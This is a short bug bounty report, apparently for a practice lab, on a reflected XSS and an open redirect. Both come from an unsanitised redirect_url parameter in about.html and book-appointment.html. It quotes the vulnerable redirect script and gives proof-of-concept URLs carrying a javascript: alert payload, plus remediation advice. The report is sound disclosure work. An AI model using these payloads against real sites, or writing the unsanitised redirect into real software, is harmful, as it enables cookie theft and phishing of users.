BugBountyHunter

Hi,

DESCRITPION:

There are 2 vulnerable endpoints:

1. endpoint is about.html, which instantly redirects you to about.php.
2. endpoint is book-appointment.html, which instantly redirects you to book-appointment.php

Not sure if these are two separated bugs, or just one, so I am reporting both of them here.
If we inspect this endpoint there is script:

<script>

    var curUrl = window.location.search;
    var params = new URLSearchParams(curUrl);
    var redirect_url = params.get('redirect_url');

    if (redirect_url == null) {
        top.location.href='about.php';
    } else {
         top.location.href=redirect_url;
    }

</script>

This script reveal new query parameter redirect_url, which then is passed to top.location.href without any sanitization and thus vulnerable to XSS.
We can use simple payload for href with javascript protocol: javascript:alert(document.domain)

POC LINK:

Reflected XSS:
https://0a3942517b17-pichik.a.firstbloodhackers.com/about.html?redirect_url=javascript:alert(document.domain)
https://0a3942517b17-pichik.a.firstbloodhackers.com/book-appointment.html?redirect_url=javascript:alert(document.domain)
Open Redirect:
https://0a3942517b17-pichik.a.firstbloodhackers.com/about.html?redirect_url=https://google.com
https://0a3942517b17-pichik.a.firstbloodhackers.com/book-appointment.html?redirect_url=https://google.com

IMPACT:

Attacker can send this to doctors and steal their cookies

REMEDIATION:

Remove this endpoint entirely, or add html encoding of special characters to prevent XSS
and filter external urls to prevent Open Redirects.